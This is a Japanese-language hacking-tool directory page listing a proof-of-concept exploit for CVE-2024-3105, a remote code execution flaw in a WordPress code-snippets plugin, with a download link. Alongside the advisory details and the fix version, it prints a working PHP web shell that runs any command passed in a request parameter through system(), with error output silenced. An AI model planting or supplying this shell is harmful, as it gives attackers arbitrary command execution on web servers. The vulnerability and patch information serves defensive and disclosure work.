Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-3105-PoC — CVE-2024-3105 の PoC エクスプロイト - The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin における WordPress リモートコード実行 (RCE) | Kitploit
ツール/GitHubGitHub/hunthubspace/cve-2024-3105-poc
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubhunthubspace/cve-2024-3105-poc

CVE-2024-3105-PoC

CVE-2024-3105 の PoC エクスプロイト - The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin における WordPress リモートコード実行 (RCE)

リポジトリを見る
212年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2024-3105 (PoC)

The Woody code snippets – Insert Header Footer Code, AdSense Ads プラグイン for WordPress は、'insert_php' ショートコードを介して、すべてのバージョン(2.5.0 を含む)においてリモートコード実行に対して脆弱です。これは、プラグインが高権限ユーザーにのみ機能の使用を制限していないためです。これにより、認証された攻撃者(投稿者レベルのアクセス以上)がサーバー上でコードを実行することが可能になります。

情報

基本スコア: 9.9 CRITICAL
ベクター: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
ソフトウェアタイプ: Plugin
スラッグ: insert-php
修復方法: バージョン 2.5.1 または新しいパッチ適用バージョンに更新
影響を受けるバージョン: <= 2.5.0

サンプル PHP コード

root@kitploit:~
<?php
    error_reporting(0);
    $cmd = "$_REQUEST[c]";
    if ($cmd == "") {
	    $cmd = "echo > NUL";
    }
    @system("$cmd");
?>
ツールをダウンロード